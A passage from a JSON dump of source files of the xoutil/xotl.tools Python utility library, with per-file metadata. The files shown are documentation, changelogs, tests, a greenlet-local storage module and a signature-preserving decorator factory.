message in Inbox.receive():\n yield message\n\n @accumulated(bandwith, 'size')\n def send():\n for message in Outbox.messages():\n yield message\n\n @timed(interval)\n def execute():\n for _ in meld(receive(), send.generate()):\n yield\n return execute()\n\n\nLet's break this into its parts:\n\n- The ``receive`` function reads the Inbox and yields each message received.\n\n It is actually an `unbounded function`:term: but we don't want to bound its\n execution in isolation.\n\n- The ``send`` unbounded function sends every message we have in the Outbox\n and yields each one. In this case we *can* apply the `accumulated` boundary\n to get a `Bounded`:class: instance.\n\n- Then we define an `execute` function bounded by `timed`. 
This function\n melds the ``receive`` and ``send`` processes, but we can't actually call\n ``send`` because we need to yield after each message has been received or\n sent. That's why we need to call the `~Bounded.generate`:meth: so that the\n time boundary is also applied to the sending process.\n\n.. note:: The structure from this example is actually taken from a real\n program, although simplified to serve better for learning. For instance,\n in our real-world program `bandwidth` could be None to indicate no size\n limit should be applied to the sending process. Also in the example we're\n not actually saving nor sending messages!\n" }, { "alpha_fraction": 0.7460317611694336, "alphanum_fraction": 0.7460317611694336, "avg_line_length": 62, "blob_id": "0e6d6c5dc9fd52cf81dc0422b17c038e8b9eac72", "content_id": "a18127e04e95c50eb24221e591f1dca904cbd18c", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 63, "license_type": "permissive", "max_line_length": 62, "num_lines": 1, "path": "/docs/source/history/_changes-1.6.3.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Added the pre-release version of `xoutil.bound`:mod: module.\n" }, { "alpha_fraction": 0.6820276379585266, "alphanum_fraction": 0.7188940048217773, "avg_line_length": 42.400001525878906, "blob_id": "33cabd414b437a564db1c6db0283cc020b07e79d", "content_id": "a5d58ed827e1c67dc4aac697273602f7795bc3d7", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 217, "license_type": "permissive", "max_line_length": 78, "num_lines": 5, "path": "/docs/source/history/_changes-2.0.8.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Incorporates all (applicable) changes from `release 1.9.8 
<rel-1.9.8>`:ref:\\\n\n- Fix bug__ when comparing version numbers (`xoutil.versions`:mod:).\n\n __ https://gitlab.merchise.org/merchise/xoutil/merge_requests/12\n" }, { "alpha_fraction": 0.7409326434135437, "alphanum_fraction": 0.7409326434135437, "avg_line_length": 37.599998474121094, "blob_id": "f86f456cd25e5644ee2cb3dbaf2efce1c7db91e7", "content_id": "c8cc2cd317c6fff551d0f28c2e81f4347c4af1e9", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 193, "license_type": "permissive", "max_line_length": 70, "num_lines": 5, "path": "/docs/source/history/_changes-1.6.1.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Added the `yield` parameter in `xoutil.fs.ensure_filename`:func:.\n\n- Added the `base` parameter in `xoutil.modules.moduleproperty`:func:.\n\n- Added the function `xoutil.fs.concatfiles`:func:.\n" }, { "alpha_fraction": 0.6364414095878601, "alphanum_fraction": 0.6381522417068481, "avg_line_length": 15.942028999328613, "blob_id": "3bfa9158030c37635dffb5238af974a9742fa557", "content_id": "75c1bb244455de15769fa517725fbadd10fb6a6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1170, "license_type": "no_license", "max_line_length": 78, "num_lines": 69, "path": "/tests/customizetestbed.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nfrom xoutil.modules import moduleproperty\nfrom xoutil.objects import memoized_property\n\n\n@moduleproperty\ndef this(self):\n return self\n\n\n@moduleproperty\ndef store(self):\n return 
getattr(self, \"_store\", None)\n\n\[email protected]\ndef store(self, value):\n setattr(self, \"_store\", value)\n\n\[email protected]\ndef store(self):\n delattr(self, \"_store\")\n\n\ndef prop(self):\n return getattr(self, \"_prop\", None)\n\n\ndef _prop_set(self, val):\n setattr(self, \"_prop\", val)\n\n\ndef _prop_del(self):\n delattr(self, \"_prop\")\n\n\nprop = moduleproperty(prop, _prop_set, _prop_del)\n\n\ndef otherfunction():\n return 1\n\n\ndef memoized(self):\n return self\n\n\nmemoized = moduleproperty(memoized, base=memoized_property)\n\ntry:\n\n @memoized.setter\n def memoized(self, value):\n pass\n\n\nexcept AttributeError:\n pass # Ok\nelse:\n raise AssertionError(\"module-level memoized_property should be read-only\")\n" }, { "alpha_fraction": 0.5593580603599548, "alphanum_fraction": 0.5595514178276062, "avg_line_length": 33.71141052246094, "blob_id": "7419492e9d7efe1086486bdc2766b79e62025938", "content_id": "96c9b1ba69ba903fe964308e674ddf4507d9ad61", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5173, "license_type": "no_license", "max_line_length": 79, "num_lines": 149, "path": "/xotl/tools/tasking/_greenlet_local.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n# This module is a modified copy of gevent.local. We simply modify it to\n# allow absence of greenlets, and fallback to thread isolation in this case.\n#\n# This decouples xotl.tools.context from gevent and allows to use the\n# greenlets if available.\n\n# WARNING: We removed the greenlet protection gevent.local does while\n# initializing a subclass of `local`. 
Instead we simply provide protection at\n# the thread level, so sub-classes of `local` MUST NOT switch greenlets.\nfrom threading import RLock\n\n\n# since each thread has its own greenlet we can just use those as identifiers\n# for the context. If greenlets are not available we fall back to the\n# current thread ident depending on where it is.\ntry:\n from greenlet import getcurrent\nexcept ImportError:\n from threading import current_thread as getcurrent\n\n\nfrom weakref import WeakKeyDictionary\nfrom copy import copy\n\n\nimport sys\n\nPYPY = hasattr(sys, \"pypy_version_info\")\n\n__all__ = [\"local\"]\n\n\nclass _localbase:\n __slots__ = \"_local__args\", \"_local__lock\", \"_local__dicts\"\n\n def __new__(cls, *args, **kw):\n self = object.__new__(cls)\n object.__setattr__(self, \"_local__args\", (args, kw))\n object.__setattr__(self, \"_local__lock\", RLock())\n dicts = WeakKeyDictionary()\n object.__setattr__(self, \"_local__dicts\", dicts)\n\n if args or kw:\n clsi, obji = cls.__init__, object.__init__\n if (PYPY and clsi == obji) or (not PYPY and clsi is obji):\n raise TypeError(\"Initialization arguments are not supported\")\n\n # We need to create the greenlet dict in anticipation of\n # __init__ being called, to make sure we don't call it again ourselves.\n dict = object.__getattribute__(self, \"__dict__\")\n dicts[getcurrent()] = dict\n return self\n\n\ndef _init_locals(self):\n d = {}\n dicts = object.__getattribute__(self, \"_local__dicts\")\n dicts[getcurrent()] = d\n object.__setattr__(self, \"__dict__\", d)\n\n # we have a new instance dict, so call out __init__ if we have one\n cls = type(self)\n if cls.__init__ is not object.__init__:\n args, kw = object.__getattribute__(self, \"_local__args\")\n cls.__init__(self, *args, **kw)\n\n\nclass local(_localbase):\n \"\"\"Greenlet-local data.\"\"\"\n\n def __getattribute__(self, name):\n d = object.__getattribute__(self, \"_local__dicts\").get(getcurrent())\n if d is None:\n # it's OK to acquire the 
lock here and not earlier, because the\n # above code won't switch out however, subclassed __init__ might\n # switch, so we do need to acquire the lock here\n lock = object.__getattribute__(self, \"_local__lock\")\n lock.acquire()\n try:\n _init_locals(self)\n return object.__getattribute__(self, name)\n finally:\n lock.release()\n else:\n object.__setattr__(self, \"__dict__\", d)\n return object.__getattribute__(self, name)\n\n def __setattr__(self, name, value):\n if name == \"__dict__\":\n clsname = self.__class__.__name__\n raise AttributeError(\n \"%r object attribute '__dict__' is read-only\" % clsname\n )\n d = object.__getattribute__(self, \"_local__dicts\").get(getcurrent())\n if d is None:\n lock = object.__getattribute__(self, \"_local__lock\")\n lock.acquire()\n try:\n _init_locals(self)\n return object.__setattr__(self, name, value)\n finally:\n lock.release()\n else:\n object.__setattr__(self, \"__dict__\", d)\n return object.__setattr__(self, name, value)\n\n def __delattr__(self, name):\n if name == \"__dict__\":\n clsname = self.__class__.__name__\n raise AttributeError(\n \"%r object attribute '__dict__' is read-only\" % clsname\n )\n d = object.__getattribute__(self, \"_local__dicts\").get(getcurrent())\n if d is None:\n lock = object.__getattribute__(self, \"_local__lock\")\n lock.acquire()\n try:\n _init_locals(self)\n return object.__delattr__(self, name)\n finally:\n lock.release()\n else:\n object.__setattr__(self, \"__dict__\", d)\n return object.__delattr__(self, name)\n\n def __copy__(self):\n currentId = getcurrent()\n d = object.__getattribute__(self, \"_local__dicts\").get(currentId)\n duplicate = copy(d)\n\n cls = type(self)\n if cls.__init__ is not object.__init__:\n args, kw = object.__getattribute__(self, \"_local__args\")\n instance = cls(*args, **kw)\n else:\n instance = cls()\n\n object.__setattr__(instance, \"_local__dicts\", {currentId: duplicate})\n\n return instance\n" }, { "alpha_fraction": 0.3368421196937561, 
"alphanum_fraction": 0.3368421196937561, "avg_line_length": 18, "blob_id": "17cdb4fa0779999af5064dfc8d2525a02fa16d9d", "content_id": "83effcf0aa2a9b4517934f222d57737f2718237f", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 95, "license_type": "permissive", "max_line_length": 23, "num_lines": 5, "path": "/docs/source/xoutil.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "=======================\n Package `xoutil`:mod:\n=======================\n\n.. automodule:: xoutil\n" }, { "alpha_fraction": 0.6344647407531738, "alphanum_fraction": 0.6344647407531738, "avg_line_length": 46.875, "blob_id": "c75bd43e543ced7f9992e4fc25e530df7d425608", "content_id": "d65eb345b1e868e46674495e4696492d54efdd1a", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 383, "license_type": "permissive", "max_line_length": 63, "num_lines": 8, "path": "/docs/source/xotl.tools/crypto.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.crypto`:mod: - Other cryptographic services\n=======================================================\n\n.. 
automodule:: xotl.tools.crypto\n :members: generate_password, PASS_PHRASE_LEVEL_BASIC,\n\t PASS_PHRASE_LEVEL_MAPPED, PASS_PHRASE_LEVEL_MAPPED_MIXED,\n\t PASS_PHRASE_LEVEL_MAPPED_DATED, PASS_PHRASE_LEVEL_STRICT,\n\t DEFAULT_PASS_PHRASE_LEVEL, MAX_PASSWORD_SIZE\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 55, "blob_id": "072c2174a69ef48642710549701c5a70f983ac69", "content_id": "cf2b4a0fd3c66b3ecb9a657dfb7edbff9d23fd0f", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 56, "license_type": "permissive", "max_line_length": 55, "num_lines": 1, "path": "/docs/source/history/_changes-1.9.2.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- `xoutil.context.NullContext`:class: is now a Mapping.\n" }, { "alpha_fraction": 0.5625, "alphanum_fraction": 0.5883767008781433, "avg_line_length": 29.882095336914062, "blob_id": "b95a6da4c60650e097d3bb622e2a9944bdb73514", "content_id": "353a1a72010f5222fb6433467f5a4b70d8adf97f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7073, "license_type": "no_license", "max_line_length": 79, "num_lines": 229, "path": "/tests/test_types.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport unittest\nimport pickle\n\nfrom xoutil.future import types\n\n\ndef test_iscollection():\n # TODO: move this test to equivalent for\n # `xoutil.values.simple.logic_collection_coerce`\n from xoutil.future.collections import UserList, UserDict\n\n def is_collection(arg):\n from collections import 
Iterable, Mapping\n\n avoid = (Mapping, str)\n return isinstance(arg, Iterable) and not isinstance(arg, avoid)\n\n assert is_collection(\"all strings are iterable\") is False\n assert is_collection(1) is False\n assert is_collection(range(1)) is True\n assert is_collection({}) is False\n assert is_collection(tuple()) is True\n assert is_collection(set()) is True\n assert is_collection(a for a in range(100)) is True\n\n class Foobar(UserList):\n pass\n\n assert is_collection(Foobar()) is True\n\n class Foobar(UserDict):\n pass\n\n assert is_collection(Foobar()) is False\n\n\nclass NoneTypeTests(unittest.TestCase):\n \"To avoid FlyCheck errors\"\n\n def test_identity(self):\n from xoutil.future.types import NoneType\n\n self.assertIs(NoneType, type(None))\n\n\nclass SimpleNamespaceTests(unittest.TestCase):\n def test_constructor(self):\n ns1 = types.SimpleNamespace()\n ns2 = types.SimpleNamespace(x=1, y=2)\n ns3 = types.SimpleNamespace(**dict(x=1, y=2))\n\n with self.assertRaises(TypeError):\n types.SimpleNamespace(1, 2, 3)\n\n self.assertEqual(len(ns1.__dict__), 0)\n self.assertEqual(vars(ns1), {})\n self.assertEqual(len(ns2.__dict__), 2)\n self.assertEqual(vars(ns2), {\"y\": 2, \"x\": 1})\n self.assertEqual(len(ns3.__dict__), 2)\n self.assertEqual(vars(ns3), {\"y\": 2, \"x\": 1})\n\n def test_unbound(self):\n ns1 = vars(types.SimpleNamespace())\n ns2 = vars(types.SimpleNamespace(x=1, y=2))\n\n self.assertEqual(ns1, {})\n self.assertEqual(ns2, {\"y\": 2, \"x\": 1})\n\n def test_underlying_dict(self):\n ns1 = types.SimpleNamespace()\n ns2 = types.SimpleNamespace(x=1, y=2)\n ns3 = types.SimpleNamespace(a=True, b=False)\n mapping = ns3.__dict__\n del ns3\n\n self.assertEqual(ns1.__dict__, {})\n self.assertEqual(ns2.__dict__, {\"y\": 2, \"x\": 1})\n self.assertEqual(mapping, dict(a=True, b=False))\n\n def test_attrget(self):\n ns = types.SimpleNamespace(x=1, y=2, w=3)\n\n self.assertEqual(ns.x, 1)\n self.assertEqual(ns.y, 2)\n self.assertEqual(ns.w, 3)\n with 
self.assertRaises(AttributeError):\n ns.z\n\n def test_attrset(self):\n ns1 = types.SimpleNamespace()\n ns2 = types.SimpleNamespace(x=1, y=2, w=3)\n ns1.a = \"spam\"\n ns1.b = \"ham\"\n ns2.z = 4\n ns2.theta = None\n\n self.assertEqual(ns1.__dict__, dict(a=\"spam\", b=\"ham\"))\n self.assertEqual(ns2.__dict__, dict(x=1, y=2, w=3, z=4, theta=None))\n\n def test_attrdel(self):\n ns1 = types.SimpleNamespace()\n ns2 = types.SimpleNamespace(x=1, y=2, w=3)\n\n with self.assertRaises(AttributeError):\n del ns1.spam\n with self.assertRaises(AttributeError):\n del ns2.spam\n\n del ns2.y\n self.assertEqual(vars(ns2), dict(w=3, x=1))\n ns2.y = \"spam\"\n self.assertEqual(vars(ns2), dict(w=3, x=1, y=\"spam\"))\n del ns2.y\n self.assertEqual(vars(ns2), dict(w=3, x=1))\n\n ns1.spam = 5\n self.assertEqual(vars(ns1), dict(spam=5))\n del ns1.spam\n self.assertEqual(vars(ns1), {})\n\n def test_repr(self):\n ns1 = types.SimpleNamespace(x=1, y=2, w=3)\n ns2 = types.SimpleNamespace()\n ns2.x = str(\"spam\")\n ns2._y = 5\n name = \"namespace\"\n\n self.assertEqual(repr(ns1), \"{name}(w=3, x=1, y=2)\".format(name=name))\n self.assertEqual(repr(ns2), \"{name}(_y=5, x='spam')\".format(name=name))\n\n def test_equal(self):\n ns1 = types.SimpleNamespace(x=1)\n ns2 = types.SimpleNamespace()\n ns2.x = 1\n\n self.assertEqual(types.SimpleNamespace(), types.SimpleNamespace())\n self.assertEqual(ns1, ns2)\n self.assertNotEqual(ns2, types.SimpleNamespace())\n\n def test_nested(self):\n ns1 = types.SimpleNamespace(a=1, b=2)\n ns2 = types.SimpleNamespace()\n ns3 = types.SimpleNamespace(x=ns1)\n ns2.spam = ns1\n ns2.ham = \"?\"\n ns2.spam = ns3\n\n self.assertEqual(vars(ns1), dict(a=1, b=2))\n self.assertEqual(vars(ns2), dict(spam=ns3, ham=\"?\"))\n self.assertEqual(ns2.spam, ns3)\n self.assertEqual(vars(ns3), dict(x=ns1))\n self.assertEqual(ns3.x.a, 1)\n\n def test_recursive(self):\n ns1 = types.SimpleNamespace(c=\"cookie\")\n ns2 = types.SimpleNamespace()\n ns3 = types.SimpleNamespace(x=1)\n 
ns1.spam = ns1\n ns2.spam = ns3\n ns3.spam = ns2\n\n self.assertEqual(ns1.spam, ns1)\n self.assertEqual(ns1.spam.spam, ns1)\n self.assertEqual(ns1.spam.spam, ns1.spam)\n self.assertEqual(ns2.spam, ns3)\n self.assertEqual(ns3.spam, ns2)\n self.assertEqual(ns2.spam.spam, ns2)\n\n def test_recursive_repr(self):\n ns1 = types.SimpleNamespace(c=str(\"cookie\"))\n ns2 = types.SimpleNamespace()\n ns3 = types.SimpleNamespace(x=1)\n ns1.spam = ns1\n ns2.spam = ns3\n ns3.spam = ns2\n name = \"namespace\"\n repr1 = \"{name}(c='cookie', spam={name}(...))\".format(name=name)\n repr2 = \"{name}(spam={name}(spam={name}(...), x=1))\".format(name=name)\n\n self.assertEqual(repr(ns1), repr1)\n self.assertEqual(repr(ns2), repr2)\n\n def test_as_dict(self):\n ns = types.SimpleNamespace(spam=\"spamspamspam\")\n\n with self.assertRaises(TypeError):\n len(ns)\n with self.assertRaises(TypeError):\n iter(ns)\n with self.assertRaises(TypeError):\n \"spam\" in ns\n with self.assertRaises(TypeError):\n ns[\"spam\"]\n\n def test_subclass(self):\n class Spam(types.SimpleNamespace):\n pass\n\n spam = Spam(ham=8, eggs=9)\n\n self.assertIs(type(spam), Spam)\n self.assertEqual(vars(spam), {\"ham\": 8, \"eggs\": 9})\n\n def test_pickle(self):\n ns = types.SimpleNamespace(breakfast=\"spam\", lunch=\"spam\")\n\n for protocol in range(pickle.HIGHEST_PROTOCOL + 1):\n pname = \"protocol {}\".format(protocol)\n try:\n ns_pickled = pickle.dumps(ns, protocol)\n except TypeError:\n raise TypeError(pname)\n ns_roundtrip = pickle.loads(ns_pickled)\n\n self.assertEqual(ns, ns_roundtrip, pname)\n\n\nclass TestDynamicClassAttribute(unittest.TestCase):\n def test_isimportable(self):\n from xoutil.future.types import DynamicClassAttribute # noqa\n" }, { "alpha_fraction": 0.5505775809288025, "alphanum_fraction": 0.5548704266548157, "avg_line_length": 32.89418029785156, "blob_id": "bd778dd49c4ec5d788280de30af79de3b63a785d", "content_id": "6418f2d91e3fa14f35ea1d126fb39930536b38e5", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12813, "license_type": "no_license", "max_line_length": 82, "num_lines": 378, "path": "/xotl/tools/decorator/meta.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Decorator-making facilities.\n\nThis module provides a signature-keeping version of the\n`xotl.tools.decorators.decorator`:func:, which is now deprecated in favor of\nthis module's version.\n\nWe scinded the decorator-making facilities from decorators per se to allow the\nmodule `xotl.tools.deprecation`:mod: to be used by decorators and at the same\ntime, implement the decorator `~xotl.tools.deprecation.deprecated`:func: more\neasily.\n\n\nThis module is an adapted work from the decorator version 3.3.2 package and is\ncopyright of its owner as stated below. Adaptation work is done by Merchise.\n\nOriginal copyright and license notices from decorator package:\n\n Copyright (c) 2005-2011, Michele Simionato\n\n All rights reserved.\n\n Redistributions of source code must retain the above copyright notice, this\n list of conditions and the following disclaimer. Redistributions in\n bytecode form must reproduce the above copyright notice, this list of\n conditions and the following disclaimer in the documentation and/or other\n materials provided with the distribution.\n\n THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE\n LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"\n\nimport sys\nimport re\nimport inspect\n\nfrom functools import wraps, partial\nfrom types import FunctionType as function\n\nfrom inspect import getfullargspec as _getfullargspec\n\n__all__ = (\"FunctionMaker\", \"flat_decorator\", \"decorator\")\n\n\nDEF = re.compile(r\"\\s*def\\s*([_\\w][_\\w\\d]*)\\s*\\(\")\n\n\n# basic functionality\nclass FunctionMaker:\n \"\"\"\n An object with the ability to create functions with a given signature.\n It has attributes name, doc, module, signature, defaults, dict and\n methods update and make.\n \"\"\"\n\n def __init__(\n self,\n func=None,\n name=None,\n signature=None,\n defaults=None,\n doc=None,\n module=None,\n funcdict=None,\n ):\n self.shortsignature = signature\n if func:\n # func can be a class or a callable, but not an instance method\n self.name = func.__name__\n if self.name == \"<lambda>\": # small hack for lambda functions\n self.name = \"_lambda_\"\n self.doc = func.__doc__\n self.module = func.__module__\n if inspect.isfunction(func):\n argspec = _getfullargspec(func)\n for a in (\n \"args\",\n \"varargs\",\n \"varkw\",\n \"defaults\",\n \"kwonlyargs\",\n \"kwonlydefaults\",\n \"annotations\",\n ):\n setattr(self, a, getattr(argspec, a, None))\n for i, arg in enumerate(self.args):\n setattr(self, \"arg%d\" % i, arg)\n self.signature = inspect.formatargspec(\n formatvalue=lambda val: \"\", *argspec\n )[1:-1]\n allargs = list(self.args)\n if self.varargs:\n allargs.append(\"*\" + 
self.varargs)\n if self.varkw:\n allargs.append(\"**\" + self.varkw)\n try:\n self.shortsignature = \", \".join(allargs)\n except TypeError:\n # exotic signature, valid only in Python 2.X\n self.shortsignature = self.signature\n self.dict = func.__dict__.copy()\n # func=None happens when decorating a caller\n if name:\n self.name = name\n if signature is not None:\n self.signature = signature\n if defaults:\n self.defaults = defaults\n if doc:\n self.doc = doc\n if module:\n self.module = module\n if funcdict:\n self.dict = funcdict\n # check existence required attributes\n assert hasattr(self, \"name\")\n if not hasattr(self, \"signature\"):\n raise TypeError(\"You are decorating a non function: %s\" % func)\n\n def update(self, func, **kw):\n \"Update the signature of func with the data in self\"\n func.__name__ = self.name\n func.__doc__ = getattr(self, \"doc\", None)\n func.__dict__ = getattr(self, \"dict\", {})\n func.func_defaults = getattr(self, \"defaults\", ())\n func.__kwdefaults__ = getattr(self, \"kwonlydefaults\", None)\n callermodule = sys._getframe(3).f_globals.get(\"__name__\", \"?\")\n func.__module__ = getattr(self, \"module\", callermodule)\n func.__dict__.update(kw)\n\n def make(self, src_templ, evaldict=None, addsource=False, **attrs):\n \"Make a new function from a given template and update the signature\"\n src = src_templ % vars(self) # expand name and signature\n evaldict = evaldict or {}\n mo = DEF.match(src)\n if mo is None:\n raise SyntaxError(\"not a valid function template\\n%s\" % src)\n name = mo.group(1) # extract the function name\n names = set(\n [name] + [arg.strip(\" *\") for arg in self.shortsignature.split(\",\")]\n )\n for n in names:\n if n in (\"_func_\", \"_call_\"):\n raise NameError(\"%s is overridden in\\n%s\" % (n, src))\n if not src.endswith(\"\\n\"): # add a newline just for safety\n src += \"\\n\" # this is needed in old versions of Python\n try:\n code = compile(src, \"<string>\", \"single\")\n eval(code, evaldict, 
evaldict)\n except Exception:\n raise\n func = evaldict[name]\n if addsource:\n attrs[\"__source__\"] = src\n self.update(func, **attrs)\n return func\n\n @classmethod\n def create(\n cls,\n obj,\n body,\n evaldict,\n defaults=None,\n doc=None,\n module=None,\n addsource=True,\n **attrs\n ):\n \"\"\"\n Create a function from the strings name, signature and body.\n \"evaldict\" is the evaluation dictionary. If addsource is true an\n attribute __source__ is added to the result. The attributes attrs are\n added,\n if any.\n \"\"\"\n if isinstance(obj, str): # \"name(signature)\"\n obj = str(obj)\n name, rest = obj.strip().split(str(\"(\"), 1)\n signature = rest[:-1] # strip a right parens\n func = None\n else: # a function\n name = None\n signature = None\n func = obj\n self = cls(func, name, signature, defaults, doc, module)\n ibody = \"\\n\".join(\" \" + line for line in body.splitlines())\n return self.make(\n \"def %(name)s(%(signature)s):\\n\" + ibody, evaldict, addsource, **attrs\n )\n\n\ndef flat_decorator(caller, func=None):\n \"\"\"Creates a signature keeping decorator.\n\n ``decorator(caller)`` converts a caller function into a decorator.\n\n ``decorator(caller, func)`` decorates a function using a caller.\n\n .. 
deprecated:: 1.9.9 Use the `decorator\n <https://pypi.org/project/decorator/>`__ package.\n\n \"\"\"\n if func is not None: # returns a decorated function\n evaldict = func.__globals__.copy()\n evaldict[\"_call_\"] = caller\n evaldict[\"_func_\"] = func\n return FunctionMaker.create(\n func,\n \"return _call_(_func_, %(shortsignature)s)\",\n evaldict,\n undecorated=func,\n __wrapped__=func,\n )\n else: # returns a decorator\n if isinstance(caller, partial):\n return partial(decorator, caller)\n # otherwise assume caller is a function\n try:\n first = inspect.getargspec(caller)[0][0] # first arg\n deco_sign = \"%s(%s)\" % (caller.__name__, first)\n deco_body = \"return flat_decorator(_call_, %s)\" % first\n except IndexError:\n deco_sign = \"%s()\" % caller.__name__\n deco_body = \"return _call_\"\n evaldict = caller.__globals__.copy()\n evaldict[\"_call_\"] = caller\n evaldict[\"flat_decorator\"] = evaldict[\"decorator\"] = flat_decorator\n return FunctionMaker.create(\n deco_sign,\n deco_body,\n evaldict,\n undecorated=caller,\n __wrapped__=caller,\n doc=caller.__doc__,\n module=caller.__module__,\n )\n\n\n# -- End of decorators package\n\n\n# FIX: This meta-decorator fails in some scenarios (old classes?)\ndef decorator(caller):\n \"\"\"Eases the creation of decorators with arguments. Normally a decorator\n with arguments needs three nested functions like this::\n\n def decorator(*decorator_arguments):\n def real_decorator(target):\n def inner(*args, **kwargs):\n return target(*args, **kwargs)\n return inner\n return real_decorator\n\n This decorator reduces the need of the first level by comprising both into\n a single function definition. However it does not removes the need for an\n ``inner`` function::\n\n >>> @decorator\n ... def plus(target, value):\n ... from functools import wraps\n ... @wraps(target)\n ... def inner(*args):\n ... return target(*args) + value\n ... return inner\n\n >>> @plus(10)\n ... def ident(val):\n ... 
return val\n\n >>> ident(1)\n 11\n\n A decorator with default values for all its arguments (except, of course,\n the first one which is the decorated `target`) may be invoked\n without parenthesis::\n\n >>> @decorator\n ... def plus2(func, value=1, missing=2):\n ... from functools import wraps\n ... @wraps(func)\n ... def inner(*args):\n ... print(missing)\n ... return func(*args) + value\n ... return inner\n\n >>> @plus2\n ... def ident2(val):\n ... return val\n\n >>> ident2(10)\n 2\n 11\n\n But (if you like) you may place the parenthesis::\n\n >>> @plus2()\n ... def ident3(val):\n ... return val\n\n >>> ident3(10)\n 2\n 11\n\n However, this is not for free, you cannot pass a single positional argument\n which type is a function::\n\n >>> def p():\n ... print('This is p!!!')\n\n >>> @plus2(p) # doctest: +ELLIPSIS\n ... def dummy():\n ... print('This is dummy')\n Traceback (most recent call last):\n ...\n TypeError: p() takes ...\n\n The workaround for this case is to use a keyword argument.\n \"\"\"\n\n @wraps(caller)\n def outer_decorator(*args, **kwargs):\n try:\n from zope.interface import Interface\n except ImportError:\n Interface = None\n # from xotl.tools.symbols import Unset as Interface\n if (\n len(args) == 1\n and not kwargs\n and (\n isinstance(args[0], (function, type))\n or issubclass(type(args[0]), type(Interface))\n )\n ):\n # This tries to solve the case of missing () on the decorator::\n #\n # @decorator\n # def somedec(func, *args, **kwargs)\n # ...\n #\n # @somedec\n # def decorated(*args, **kwargs):\n # pass\n #\n # Notice, however, that this is not general enough, since we try\n # to avoid inspecting the calling frame to see if the () are in\n # place.\n func = args[0]\n return caller(func)\n elif len(args) > 0 or len(kwargs) > 0:\n\n def _decorator(func):\n return partial(caller, **kwargs)(*((func,) + args))\n\n return _decorator\n else:\n return caller\n\n return outer_decorator\n" }, { "alpha_fraction": 0.5538879632949829, 
